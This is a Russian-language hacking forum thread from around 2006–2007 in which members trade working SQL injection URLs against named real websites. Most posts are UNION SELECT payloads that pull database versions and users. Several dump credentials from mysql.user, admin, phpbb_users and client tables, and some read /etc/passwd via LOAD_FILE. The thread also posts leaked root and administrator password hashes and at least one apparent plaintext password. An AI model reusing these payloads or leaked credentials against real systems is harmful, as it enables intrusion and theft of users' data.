SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6/*
    http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(name,char(58),pwd,char(58),command,char(58),email,char(58),url,char(58),country,char(58),city),char),5,6+from+users+limit+0,1/*
    А вот эта может уже и была...

    Code:
    http://www.web-segment.ru/index.php?p=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
    2 people like this.
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://c82.net/article.php?ID=-25+union+select+concat(version(),char(58),user()),2,3,4/*
    чет с таблицами не получилось =\
    +
    Code:
    http://www.dukemednews.org/news/article.php?id=-6041+union+select+concat(user,char(58),password),2,3,4,5,version(),7,8+from+mysql.user/*
     
    #1622 Constantine, 4 Apr 2007
    Last edited: 4 Apr 2007
    1 person likes this.
  3. en4cer

    en4cer Elder - Старейшина

    Joined:
    10 Feb 2006
    Messages:
    80
    Likes Received:
    5
    Reputations:
    0
    Code:
    http://freejob.ru/message_to_vacancy.php?id_m=-1'+UNION+SELECT+1,2,3,4,5,6,7,concat(user,0x3a,password),9,11,12,13,14,15,16,17,18,19,20+FROM+mysql.user/*
    root:nhfdthcf
     
    3 people like this.
  4. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),char(58),user(),char(58),version()),9,10,11,12,13,14/*
     
  5. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/*&mode=chrono&order=0
    Вывод в тайтле( сам чуть не прозевал=\)
    Code:
    http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version(),user(),database())+using+latin1)/*
     
  6. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    бгг =)

    Code:
    http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/*

    www.f1-world.ru

    5 мускуль
    Code:
    http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
     
    #1626 Ksander, 4 Apr 2007
    Last edited: 4 Apr 2007
    2 people like this.
  7. XenOtai

    XenOtai Elder - Старейшина

    Joined:
    30 Dec 2006
    Messages:
    25
    Likes Received:
    17
    Reputations:
    16
    Code:
    http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/* 

    Возможно ли что-нибудь дальше?
     
  8. LolFEm

    LolFEm Elder - Старейшина

    Joined:
    8 Sep 2006
    Messages:
    160
    Likes Received:
    52
    Reputations:
    5
    для mysql.user запрос не прокатил... может быть есть другая база данных...

    SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
     
  9. alextoun

    alextoun Вылет с Трассы

    Joined:
    7 May 2006
    Messages:
    563
    Likes Received:
    216
    Reputations:
    96
    пока еду дальше

    заипался
     
    #1629 alextoun, 4 Apr 2007
    Last edited: 4 Apr 2007
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/*
    http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13+from+subscribe+limit+0,1/*
    Code:
    http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
    3 people like this.
  11. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^
    На загрузку файлов не проверял.
    На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.

     
    2 people like this.
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Code:
    http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+clients/*
     
    3 people like this.
  13. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    compoundsemi.com

    Code:
    http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name,0x3a,password),18+from+admin+limit+2,1/*
    C пасами жопа =\
     
    3 people like this.
  14. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Можно книжек заказать =)
    Code:
    http://petropol.com/browse/fetch.php3?id=-104544+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,19,20,21,22,23,24,25,26,27,28,29,30,31/*&type=book
    
     
    2 people like this.
  15. random

    random Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    50
    Likes Received:
    54
    Reputations:
    11
    Code:
    http://oz.com.ru/st.php?id=218+union+select+concat(database(),0x3a,version()),2,3,4,5/*
    Code:
    http://gapart.com/ru/he/work.php?catid=1&page=1&id=-4+union+select+1,2,version(),4,5,6/*
     
    2 people like this.
  16. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    akusherstvo.ru :)
    Code:
    http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(user,0x3a,password),2+from+mysql.user/*
    root:5d1a051535bd4dcd

    также чем-то могут быть интересны таблицы admin, myuser, phpbb_users, a_admin
    пример скули форум:
    Code:
    http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(username,0x3a,user_password),2+from+phpbb_users+limit+2,1/*
    Администратор:3693dc9bc65e54f85826ddca773dbd5b
    8.5k users
    в общем-то, там еще 150 таблиц, есть простор для мозгового штурма)
     
    4 people like this.
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Может и было...

    Code:
    http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+16,1/*
    http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(97,99,99,111,117,110,116,115)+limit+0,1/*
    http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(ID,char(58),LOGIN,char(58),PASS,char(58),FIO,char(58),EMAIL),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+accounts+limit+0,1/*
    Code:
    http://www.divanodrom.ru/textile.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char)/*
     
    3 people like this.
  18. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    http://www.fmodels.net - я хекнул много блондинок, теперь они все мои =)

    Code:
    http://www.fmodels.net/news.php3?id=-10+union+select+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user+limit+1,3/*
    Надо с лимитом играться =\

    Code:
    http://redcame.org.ar/news.php3?id=-550+union+select+1,2,3/*
    
     
    4 people like this.
  19. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    2 zl0ba:
    зачем лимит?
    сразу весь список :)
    Code:
    http://www.fmodels.net/news.php3?id=-10+union+select+1,2,concat(user,0x3a,password),4,5,6,7+from+mysql.user/*
    а по твоему линку вообще вывода не увидел, мб глюки..
     
    3 people like this.
  20. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Ну и еще один интернет - магазин...

    root:7c09cac038aef27b

    Админку не нашел, в robots.txt тоже не прописано =\
     
    2 people like this.
Thread Status:
Not open for further replies.